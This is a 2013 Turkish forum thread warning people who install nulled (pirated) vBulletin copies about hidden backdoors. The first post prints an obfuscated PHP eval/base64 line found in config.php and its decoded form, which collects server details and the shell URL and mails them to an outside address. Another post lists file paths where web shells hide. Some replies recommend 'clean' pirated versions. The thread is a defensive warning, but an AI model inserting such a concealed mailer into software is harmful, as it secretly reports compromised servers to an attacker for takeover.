• 13-11-2013, 21:46:00
    #1
    M2P
    Üyeliği durduruldu
    Selam arkadaşlar,

    Null kuran arkadaşlarımız ve ya null kullanan arkadaşlarımız bu konuyu okumasında yarar var.

    Şimdi config.php gibi dosyalarda bu tür gizli komut gömülü

    Kaynak : SPHZT

    <?php eval("?>".base64_decode("PD9waHANCiRraW1lPSJ2YnR1cmthbUBnbWFpbC5jb20iOw0KJGJhc2xpaz0iRUxfTXVIYU1NZUQgU2VydmVyIEF2Y2lzaSBWMS4wIjsNCiRFTF9NdUhhTU1lRD0iRG9zeWEgWW9sdSA6ICIuJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4icm4iOw0KJEVMX011SGFNTWVELj0iU2VydmVyIEFkbWluIDogIi4kX1NFUlZFUlsnU0VSVkVSX0FETUlOJ10uInJuIjsNCiRFTF9NdUhhTU1lRC49IlNlcnZlciBpc2xldGltIHNpc3RlbWkgOiAiLiRfU0VSVkVSWydTRVJWRVJfU09GVFdBUkUnXS4icm4iOw0KJEVMX011SGFNTWVELj0iU2hlbGwgTGluayA6IGh0dHA6Ly8iLiRfU0VSVkVSWydTRVJWRVJfTkFNRSddLiRfU0VSVkVSWydQSFBfU0VMRiddLiJybiI7DQokRUxfTXVIYU1NZUQuPSJBdmxhbmFuIFNpdGUgOiAiIC4kX1NFUlZFUlsnSFRUUF9IT1NUJ10uInJuIjsNCm1haWwoJGtpbWUsICRiYXNsaWssICRFTF9NdUhhTU1lRCk7DQo/Pg==")); ?>
    Açmak gerekirse,

    <?php
    $kime="vbturkam@gmail.com";
    $baslik="EL_MuHaMMeD Server Avcisi V1.0";
    $EL_MuHaMMeD="Dosya Yolu : ".$_SERVER['DOCUMENT_ROOT']."rn";
    $EL_MuHaMMeD.="Server Admin : ".$_SERVER['SERVER_ADMIN']."rn";
    $EL_MuHaMMeD.="Server isletim sistemi : ".$_SERVER['SERVER_SOFTWARE']."rn";
    $EL_MuHaMMeD.="Shell Link : http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."rn";
    $EL_MuHaMMeD.="Avlanan Site : " .$_SERVER['HTTP_HOST']."rn";
    mail($kime, $baslik, $EL_MuHaMMeD);
    Null kurdurtucaksanız, internetten bulma değil KİŞİNİN KENDİ KIRDIĞI NULL dosyaları kurdurtmanızı tercih ederim..

    (Telefondan kopyala yapıştır yaptım ana kodda eksik olabilir, siz yinede anladınız, yazım hatalarım için özür dilerim mobilden açtım konuyu)
  • 13-11-2013, 21:54:34
    #2
    Üyeliği durduruldu
    Sağlıklı bi verim alabilmek için açıkcası null pek tavsiye etmiyorum.

    Bir şeyler yapmak isteyen arkadaşların lisanslı alması ve projelerini bu şekilde yapmaları daha iyi verimler vericektir.
  • 13-11-2013, 21:56:12
    #3
    Arkadaşlar bir kaç bişey de ben ekleyeyim.
    "Vbulletin indir" kelimesinde googlede öne çıkmak için yarışanlar var.
    Birçok site bu kelimeyle kendini öne çekti ve bu sitelerden indirdiğiniz vbullettinlerin içinde shell adı verilen zararlı yazılımlar mevcut. Bu yazılımlar sayesinde sitenizdeki istedikleri dosyaya ve sql'e ulaşım sağlayabilirler. Sürekli dizin değiştirerek bu shelllerin yakalanmasını engellemeye çalışyorlar. İndirdiğiniz zaman kontrol etmenizi ve içinde tanımlayamadığınız kodları gördüğünüz zaman anında silmeniz gereken klasörlerin bir kaçını yazayım size.

    /includes/datastore/data_manuel.php
    /includes/class_dm_pomo.php
    /includes/cron/vb-stats.php
    /includes/cron/vb-activate.php

    Gibi. Dikkat etmenizi tavsiye edeirm piyasada içinde shell veya açık bulunmayan vbulletin bulamazsınız. Null vbulletin kurmak %95 civarıyla hacklenmeyi göze almalıdırlar.
  • 17-11-2013, 20:37:34
    #4
    Null kullanacaksınız gidin yabancı null bulun mesala DGT teamın Null versiyonları tertemiz.
  • 17-11-2013, 20:58:55
    #5
    benim null Allah a şükür 2009 dan beri kullanırım sorunsuz çalışır ve hacklenmez